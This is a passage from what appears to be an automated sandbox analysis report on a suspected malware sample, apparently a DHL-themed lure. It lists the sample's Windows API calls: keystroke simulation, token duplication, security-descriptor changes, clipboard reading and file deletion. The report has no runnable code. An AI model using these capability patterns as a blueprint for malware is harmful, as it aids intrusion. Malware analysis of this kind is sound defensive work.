                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 000C4BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 000C4C82
                                                                                      • wsprintfW.USER32 ref: 000C4CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C4D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d$p]
                                                                                      • API String ID: 4054740463-435250244
                                                                                      • Opcode ID: ed0d21a5da53238f6599fbcf778f5b4d2e434d8f349f154cb5969773e3c624d7
                                                                                      • Instruction ID: d5968f93b2617f8765b1ffe18ab7b52741b25716baf2c848df20d66d2f9030e1
                                                                                      • Opcode Fuzzy Hash: ed0d21a5da53238f6599fbcf778f5b4d2e434d8f349f154cb5969773e3c624d7
                                                                                      • Instruction Fuzzy Hash: E212BC71A00215ABFB259F28CC59FAE7BF8FF45710F10412DF51AEA2A1DBB89941CB50
                                                                                      Function 0004F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0004F998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
                                                                                      • IsIconic.USER32(00000000), ref: 0008F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 0008F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0008F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0008F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0008F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                      • Instruction ID: 6b534552e183d3afa7291f7dba52558037ffc53d3998300a6cda102c13a3ece0
                                                                                      • Opcode Fuzzy Hash: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                      • Instruction Fuzzy Hash: F8314171A40218BBFB206BB59C4AFBF7EACEB44B50F10006AFA05E61D1C6B55D41AB60
                                                                                      Function 00091201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 000912B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
                                                                                      • GetProcessWindowStation.USER32 ref: 000912EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000912F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
                                                                                        • Part of subcall function 000910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                        • Part of subcall function 000910BF: CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: aefe66fe084abb9c2730f5549a318db40e90f95e2b35ef4bfb79cb9a6e503205
                                                                                      • Instruction ID: 50745b41ef0dd2252fa9c0297fcc0c35f53a7f3b80dbeeb373ac516b2de4aaa1
                                                                                      • Opcode Fuzzy Hash: aefe66fe084abb9c2730f5549a318db40e90f95e2b35ef4bfb79cb9a6e503205
                                                                                      • Instruction Fuzzy Hash: 3F81BF71A0020AAFEF219FA4DC49FEE7BF9EF08704F144129FA14B61A1C7758954EB60
                                                                                      Function 00090B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D7F
                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                      • Instruction ID: d5dddb060d4178d8218017bdb3e3afc50268151a0e25116ef7be52758d608945
                                                                                      • Opcode Fuzzy Hash: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                      • Instruction Fuzzy Hash: 8771697290120AAFEF10DFA5DC48FEEBBBCBF05304F144515F918A6291D775AA05DBA0
                                                                                      Function 000AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(000CCC08), ref: 000AEB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 000AEB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 000AEB43
                                                                                      • CloseClipboard.USER32 ref: 000AEB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEB87
                                                                                      • CloseClipboard.USER32 ref: 000AEB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 000AEBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 000AEBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 000AEC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 000AEC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AEC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AECF3
                                                                                      • CountClipboardFormats.USER32 ref: 000AED14
                                                                                      • CloseClipboard.USER32 ref: 000AED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                      • Instruction ID: db709fe28f0427819330a27a2f820508e89708a75e9ea304bed440e5a403af04
                                                                                      • Opcode Fuzzy Hash: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                      • Instruction Fuzzy Hash: 5D61E034204341AFE311EFA4D888F6AB7E8EF85714F14451DF45A9B2A2CB75DD06CB62
                                                                                      Function 000A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A69BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A75
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3830820486-3289030164
                                                                                      • Opcode ID: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                                                                      • Instruction ID: 1010464e94b6e1f5039746b3603dc656ca9ece743af2d672c2268448d7a2c8a7
                                                                                      • Opcode Fuzzy Hash: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                                                                      • Instruction Fuzzy Hash: 4ED160B2508300AFC315EBA0C885EABB7ECAF89704F44491DF589D7192EB75DA44CB62
                                                                                      Function 000A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000A9663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000A96A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 000A96BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A96D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A96DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A96FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A9768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9772
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                      • Instruction ID: eab9dc92875b6523a15c29596f0574120f6c62b34ac064f479ce50f7c4fa97f0
                                                                                      • Opcode Fuzzy Hash: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                      • Instruction Fuzzy Hash: A131B3326446196AEB14EFF4EC49EEE77EC9F4A321F104155F919E2090DB34DE848F24
                                                                                      Function 000A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000A97BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A9819
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A9824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A9840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A9890
                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A98AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A98B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98D5
                                                                                        • Part of subcall function 0009DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0009DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                      • Instruction ID: daad73ee5136a16af65d732cf552373528cc7764132f700469d5b2afd078d132
                                                                                      • Opcode Fuzzy Hash: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                      • Instruction Fuzzy Hash: 2731B2316406196AEF20EFF4EC48EEE77EC9F47321F144155E914A2191DF39DA85CB60
                                                                                      Function 000A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 000A8257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 000A8267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000A8273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A8310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                      • Instruction ID: aadbab18307e877921e5c41c3b5c252d94dc07ad87232ce683931a1a60733ca7
                                                                                      • Opcode Fuzzy Hash: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                      • Instruction Fuzzy Hash: 31616C725047459FDB10EF60C844EAEB3E8FF89314F04892EF98997252DB35EA45CB92
                                                                                      Function 0009D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0009D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D237
                                                                                        • Part of subcall function 0009D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0009D21C,?,?), ref: 0009D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0009D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: 4bf4caa01191087c23dfc9292e5b574eae86ce6dac37b16d7b2e556bef07a453
                                                                                      • Instruction ID: 68a07b9260a803f0d34132b32ec99e1d497784ad96b3b4f0d6bac2e6f6d8aded
                                                                                      • Opcode Fuzzy Hash: 4bf4caa01191087c23dfc9292e5b574eae86ce6dac37b16d7b2e556bef07a453
                                                                                      • Instruction Fuzzy Hash: FA617C3184510DABDF06EBE0DA92DEDB7B9AF55300F604166E442771A2EF30AF09DB60
                                                                                      Function 000AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
